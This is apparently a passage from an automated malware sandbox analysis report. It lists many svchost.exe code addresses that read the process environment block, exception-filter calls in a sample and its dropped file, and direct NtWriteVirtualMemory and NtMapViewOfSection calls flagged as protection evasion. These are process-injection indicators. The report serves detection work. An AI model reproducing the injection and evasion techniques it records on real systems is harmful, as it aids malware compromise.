                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034061E5 mov eax, dword ptr fs:[00000030h]9_2_034061E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03370185 mov eax, dword ptr fs:[00000030h]9_2_03370185
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EC188 mov eax, dword ptr fs:[00000030h]9_2_033EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EC188 mov eax, dword ptr fs:[00000030h]9_2_033EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4180 mov eax, dword ptr fs:[00000030h]9_2_033D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D4180 mov eax, dword ptr fs:[00000030h]9_2_033D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033601F8 mov eax, dword ptr fs:[00000030h]9_2_033601F8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE1D0 mov eax, dword ptr fs:[00000030h]9_2_033AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F61C3 mov eax, dword ptr fs:[00000030h]9_2_033F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F61C3 mov eax, dword ptr fs:[00000030h]9_2_033F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C6030 mov eax, dword ptr fs:[00000030h]9_2_033C6030
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A020 mov eax, dword ptr fs:[00000030h]9_2_0332A020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C020 mov eax, dword ptr fs:[00000030h]9_2_0332C020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E016 mov eax, dword ptr fs:[00000030h]9_2_0334E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4000 mov ecx, dword ptr fs:[00000030h]9_2_033B4000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D2000 mov eax, dword ptr fs:[00000030h]9_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335C073 mov eax, dword ptr fs:[00000030h]9_2_0335C073
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332050 mov eax, dword ptr fs:[00000030h]9_2_03332050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B6050 mov eax, dword ptr fs:[00000030h]9_2_033B6050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F60B8 mov eax, dword ptr fs:[00000030h]9_2_033F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F60B8 mov ecx, dword ptr fs:[00000030h]9_2_033F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033280A0 mov eax, dword ptr fs:[00000030h]9_2_033280A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C80A8 mov eax, dword ptr fs:[00000030h]9_2_033C80A8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333208A mov eax, dword ptr fs:[00000030h]9_2_0333208A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C0F0 mov eax, dword ptr fs:[00000030h]9_2_0332C0F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033720F0 mov ecx, dword ptr fs:[00000030h]9_2_033720F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0332A0E3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033380E9 mov eax, dword ptr fs:[00000030h]9_2_033380E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B60E0 mov eax, dword ptr fs:[00000030h]9_2_033B60E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B20DE mov eax, dword ptr fs:[00000030h]9_2_033B20DE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov eax, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov ecx, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336273C mov eax, dword ptr fs:[00000030h]9_2_0336273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AC730 mov eax, dword ptr fs:[00000030h]9_2_033AC730
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C720 mov eax, dword ptr fs:[00000030h]9_2_0336C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C720 mov eax, dword ptr fs:[00000030h]9_2_0336C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330710 mov eax, dword ptr fs:[00000030h]9_2_03330710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360710 mov eax, dword ptr fs:[00000030h]9_2_03360710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C700 mov eax, dword ptr fs:[00000030h]9_2_0336C700
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03338770 mov eax, dword ptr fs:[00000030h]9_2_03338770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340770 mov eax, dword ptr fs:[00000030h]9_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330750 mov eax, dword ptr fs:[00000030h]9_2_03330750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BE75D mov eax, dword ptr fs:[00000030h]9_2_033BE75D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372750 mov eax, dword ptr fs:[00000030h]9_2_03372750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372750 mov eax, dword ptr fs:[00000030h]9_2_03372750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4755 mov eax, dword ptr fs:[00000030h]9_2_033B4755
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov esi, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov eax, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336674D mov eax, dword ptr fs:[00000030h]9_2_0336674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033307AF mov eax, dword ptr fs:[00000030h]9_2_033307AF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E47A0 mov eax, dword ptr fs:[00000030h]9_2_033E47A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D678E mov eax, dword ptr fs:[00000030h]9_2_033D678E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033347FB mov eax, dword ptr fs:[00000030h]9_2_033347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033347FB mov eax, dword ptr fs:[00000030h]9_2_033347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033527ED mov eax, dword ptr fs:[00000030h]9_2_033527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BE7E1 mov eax, dword ptr fs:[00000030h]9_2_033BE7E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333C7C0 mov eax, dword ptr fs:[00000030h]9_2_0333C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B07C3 mov eax, dword ptr fs:[00000030h]9_2_033B07C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E627 mov eax, dword ptr fs:[00000030h]9_2_0334E627
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03366620 mov eax, dword ptr fs:[00000030h]9_2_03366620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03368620 mov eax, dword ptr fs:[00000030h]9_2_03368620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333262C mov eax, dword ptr fs:[00000030h]9_2_0333262C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03372619 mov eax, dword ptr fs:[00000030h]9_2_03372619
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE609 mov eax, dword ptr fs:[00000030h]9_2_033AE609
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334260B mov eax, dword ptr fs:[00000030h]9_2_0334260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03362674 mov eax, dword ptr fs:[00000030h]9_2_03362674
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F866E mov eax, dword ptr fs:[00000030h]9_2_033F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F866E mov eax, dword ptr fs:[00000030h]9_2_033F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A660 mov eax, dword ptr fs:[00000030h]9_2_0336A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A660 mov eax, dword ptr fs:[00000030h]9_2_0336A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334C640 mov eax, dword ptr fs:[00000030h]9_2_0334C640
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033666B0 mov eax, dword ptr fs:[00000030h]9_2_033666B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336C6A6 mov eax, dword ptr fs:[00000030h]9_2_0336C6A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334690 mov eax, dword ptr fs:[00000030h]9_2_03334690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334690 mov eax, dword ptr fs:[00000030h]9_2_03334690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AE6F2 mov eax, dword ptr fs:[00000030h]9_2_033AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B06F1 mov eax, dword ptr fs:[00000030h]9_2_033B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B06F1 mov eax, dword ptr fs:[00000030h]9_2_033B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0336A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336A6C7 mov eax, dword ptr fs:[00000030h]9_2_0336A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340535 mov eax, dword ptr fs:[00000030h]9_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033C6500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03404500 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03338550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03332582 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03332582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03364588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033325E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033365D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336A430 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0332E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0332C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03368402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BC460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033EA456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0332645D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335245A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033644B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BA4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033364AB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033EA49A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033304E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03402B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03404B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0332CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03328B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033DEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033FAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033D8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03340BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03338BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033DEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03350BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03330BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03354A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0335EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03336A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03340A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03338AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03386AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03368A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0333EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03404A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03330AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03364AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03386ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03404940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033C892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03328918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03356962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0337096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0337096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033BE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0333A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03352835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03352835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0336A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_033D483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C480A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C1A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\25Lz840Dmh.exe | Code function: 5_2_00C1A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0011A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe | Code function: 7_2_0011A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exe | NtMapViewOfSection: Direct from: 0x77762D1C
